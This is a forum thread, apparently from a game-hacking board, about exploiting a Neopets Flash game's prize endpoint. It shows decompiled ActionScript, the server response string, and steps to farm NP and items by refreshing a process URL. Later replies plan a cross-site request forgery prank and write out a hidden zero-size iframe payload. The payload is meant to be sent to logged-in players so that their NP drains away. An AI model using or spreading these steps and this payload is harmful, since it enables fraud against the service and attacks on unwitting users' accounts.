In interested..
"intrested , intrested"
FEED ME WITH SPOONS.
I found it without a iphone \o/.
In interested..
(you need an account to see links)
LOL 6char
It works like so:
The game loads this when you open it:
Then in the script of this sprite it gets a html return from this url:
and parses it like so:
(you need an account to see links)
PHP Code:
// Action script...
// [Action in Frame 1]
stop ();
// [Action in Frame 3]
if (_root.server == "done")
{
_root.attachHammer();
_root.gotoAndStop("test");
}
else if (_root.server == "failed")
{
_root.feedback = unescape(_root.msg);
gotoAndStop(2);
}
else
{
play;
} // end else if
// [Action in Frame 9]
gotoAndPlay(3);
As you can see its looking for "failed" in the return , The problem is if we send it directly through a browser or something without a cache the prize code still works....
&msg=%3Cb%3EOops%21%3C%2Fb%3E+-+You%27ve+already+played+this+game+within+the+last +%3Cb%3E6%3C%2Fb%3E+hours%21&server=failed&prize_m sg=%3Cfont+size%3D%2214%22%3ECongratulations%21+Yo u+won+253+NP%21+You+scored+12+out+of+100.%3C%2Ffon t%3E&result=2&filename=&np_award=253&name=&server= done&obj_info_id=0&
So heres what you do , start a game legitly but dont click the button to begin , then close it.
Now load this url:
(you need an account to see links)
keep refreshing it. Now view your inventory.
Pretty much a item gen for the items it gives you , dont't think they are worth much. Use it while it last.
@(you need an account to see links)
Last edited by DarkByte; 02-23-2013 at 05:46 AM.
Fury (02-23-2013),Graff (02-23-2013),kooldude888(02-23-2013)
Doing this seems to allow negative NP LOL
DarkByte(02-23-2013)
Maybe you can go so far negative it clocks over and becomes a positive? lool
We shall certainly see What a funny exploit. I don't even care about the items. I'm more interested in seeing how far negative I can go before they catch it.
I remember overflows like that in pinball games my dad used to play. He was awsome at any pinball game and considered it beat when he "clocked" it. This meant getting so much score that the game litrally couldnt handle it and the score would reset to 0 or it would cause a overflow and the game would crash. Then it would be clocked. lol.
I doubt the same would apply for a database but would be funny .
Something i just thought about , make a html page with 10000 i frames on that load that url in a 0x0 (invis) frame.
Send someone the link whos logged into neopets. Laugh as there np vanishes xD trololol.
omg brilliant lmao. I don't have any neo-enemies though. Would be funny to see people on the PC have their NP fked hardcore.
---------- Post added at 05:20 AM ---------- Previous post was at 05:13 AM ----------
Would it just be this repeatedly? <iframe src='http://www.neopets.com/halloween/strtest/process_strtest.phtml' width='0' height='0' frameheight='0' framewidth='0' frameborder='0'></iframe>
Yep